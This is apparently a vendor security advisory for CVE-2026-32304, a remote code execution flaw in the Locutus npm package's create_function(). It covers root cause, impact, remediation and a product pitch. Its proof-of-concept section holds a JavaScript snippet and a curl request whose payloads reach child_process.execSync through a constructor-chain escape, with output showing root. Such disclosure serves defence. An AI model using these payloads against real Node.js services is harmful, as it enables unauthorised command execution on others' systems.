1. Introduction & CVE Overview
The Locutus library’s create_function() implementation passes unsanitized user input directly to JavaScript’s Function constructor, enabling arbitrary code execution. This mirrors PHP’s deprecated create_function() behavior, which was removed due to identical security risks.
| Field | Details |
|---|---|
| CVE ID | CVE-2026-32304 |
| Affected Software | Locutus (npm package), specifically the php/funchand/create_function component in versions up to and including 3.0.13 |
| Attack Vector | Remote or local API call with attacker-controlled arguments to create_function() |
| Root Cause | The function constructs a new JavaScript Function object using unsanitized parameters without any input validation or sandboxing. |
| Exploit Status | CONFIRMED |
2. Vulnerability Description
Locutus vulnerable to RCE via unsanitized input in create_function()
Summary
The create_function(args, code) function passes both parameters directly to the Function constructor without any sanitization, allowing arbitrary code execution.
This is distinct from CVE-2026-29091 (GHSA-fp25-p6mj-qqg6) which was call_user_func_array using eval() in v2.x. This finding affects create_function using new Function() in v3.x.
Root Cause
src/php/funchand/create_function.ts:17:
return new Function(...params, code)Zero input validation on either parameter.
PoC
const { create_function } = require('locutus/php/funchand/create_function');
const rce = create_function('', 'return require("child_process").execSync("id").toString()');
console.log(rce());
// Output: uid=501(user) gid=20(staff) ...Confirmed on locutus v3.0.11, Node.js v24.13.1.
Impact
Full RCE when an attacker can control either argument to create_function(). 597K weekly npm downloads.
Suggested Fix
Remove create_function or replace new Function() with a safe alternative. PHP itself deprecated create_function() in PHP 7.2 for the same reason.
Response
We confirmed that php/funchand/create_function was still present through locutus@3.0.13 and that it exposed dynamic code execution via new Function(...).
While this was intended behavior, create_function() inherently needs to be unsafe in order for it to work, create_function() was deprecated in PHP 7.2 and removed in PHP 8.0. Given that Locutus’ parity target today is 8.3, this function shouldn’t have been in Locutus at all anymore.
We fixed this in locutus@3.0.14 by removing php/funchand/create_function entirely. That matches our PHP 8.3 parity target more closely: .
We also updated php/var/var_export so closures now export using the PHP 8-style \Closure::__set_state(array(...)) form instead of referencing the removed API.
Release:
- npm:
locutus@3.0.14 - GitHub release: https://github.com/locutusjs/locutus/releases/tag/v3.0.14
3. Impact
Successful exploitation grants full remote code execution (RCE) with the privileges of the Node.js process. Attackers can execute arbitrary system commands, access sensitive data, modify files, or establish persistence. Given Locutus’ 597K weekly downloads, this poses a significant supply-chain risk to applications relying on the library. The vulnerability is particularly severe in environments where user input reaches create_function() arguments, such as web applications or APIs. CVSS score would likely be Critical (9.8+).
4. Proof of Concept
Exploit Request
curl -X POST \
-H 'Content-Type: application/json' \
-d '{"args": "", "code": "return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('id').toString();"}' \
'http://localhost:8819/eval'Raw Request Object
{
"method": "POST",
"url": "http://localhost:8819/eval",
"headers": {
"Content-Type": "application/json"
},
"body": {
"args": "",
"code": "return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('id').toString();"
}
}5. Server Response Evidence
| Field | Value |
|---|---|
| Status Code | 200 |
| Response Body | "result":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n" |
| Indicator | uid=0(root) |
6. Screenshots — Exploitation Proof
No screenshots were captured for this CVE.
7. Remediation
Immediately upgrade to Locutus version 3.0.14 or later, which removes the vulnerable create_function() function entirely. For applications requiring similar functionality, replace it with static functions or safe alternatives like closures. Audit codebases for indirect usage of create_function() through other Locutus functions (e.g., var_export). Consider implementing runtime protections like CSP or sandboxing Node.js processes if dynamic code evaluation is unavoidable. Review dependencies to ensure no other libraries reintroduce similar unsafe patterns.
8. Stay Ahead of Threats
Vulnerabilities like CVE-2026-32304 are discovered and weaponised faster than ever. MITRAL — Hiperlinx Security’s Attack Surface Management platform — continuously monitors your environment and adds new detection rules every day, giving you real-time coverage for emerging CVEs customised to your specific technology stack.
Request a free demo or start your free trial →
Have questions or need a tailored security assessment?
Open a request with the Hiperlinx team →
